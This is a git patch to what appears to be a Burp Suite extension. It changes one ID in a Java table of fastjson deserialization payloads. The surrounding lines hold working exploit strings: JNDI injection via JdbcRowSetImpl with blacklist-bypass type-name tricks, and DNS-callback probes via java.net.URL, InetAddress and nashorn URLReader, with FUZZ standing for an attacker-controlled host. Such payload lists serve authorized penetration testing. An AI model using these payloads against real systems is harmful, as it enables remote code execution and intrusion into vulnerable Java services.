From 9f3d5d29549b9cebc4ae88501c2dd34f33322469 Mon Sep 17 00:00:00 2001 From: Xm17 <27048404+kN6jq@users.noreply.github.com> Date: Thu, 14 Nov 2024 11:22:51 +0800 Subject: [PATCH] =?UTF-8?q?fastjsonpayload=E4=BF=AE=E5=A4=8D?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/main/java/burp/utils/DbUtils.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/java/burp/utils/DbUtils.java b/src/main/java/burp/utils/DbUtils.java index d2e0742..372028b 100644 --- a/src/main/java/burp/utils/DbUtils.java +++ b/src/main/java/burp/utils/DbUtils.java @@ -115,7 +115,7 @@ public static void create() { sqls.add("INSERT INTO \"fastjson\" VALUES (25, 'jndi', '{\"bbbbbb\":{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"FUZZ\", \"autoCommit\":true}}');"); sqls.add("INSERT INTO \"fastjson\" VALUES (26, 'jndi', '{\"bbbbbb\":{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"FUZZ\", \"autoCommit\":true}}');"); sqls.add("INSERT INTO \"fastjson\" VALUES (27, 'version', '[\"a\"]');"); - sqls.add("INSERT INTO \"fastjson\" VALUES (27, 'version', '{\"@type\": \"java.lang.AutoCloseable\"');"); + sqls.add("INSERT INTO \"fastjson\" VALUES (34, 'version', '{\"@type\": \"java.lang.AutoCloseable\"');"); sqls.add("INSERT INTO \"fastjson\" VALUES (28, 'dns', 'Set[{\"@type\":\"java.net.URL\",\"val\":\"http://dayu9.FUZZ\"}');"); sqls.add("INSERT INTO \"fastjson\" VALUES (29, 'dns', '{\"name\":{\"@type\":\"java.net.InetAddress\",\"val\":\"dayu9xiaoyu47.FUZZ\"}}');"); sqls.add("INSERT INTO \"fastjson\" VALUES (30, 'dns', '{\"a\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.alibaba.fastjson.JSONReader\",\"reader\":{\"@type\":\"jdk.nashorn.api.scripting.URLReader\",\"url\":\"http://dayu37xiaoyu68.FUZZ\"}}}');");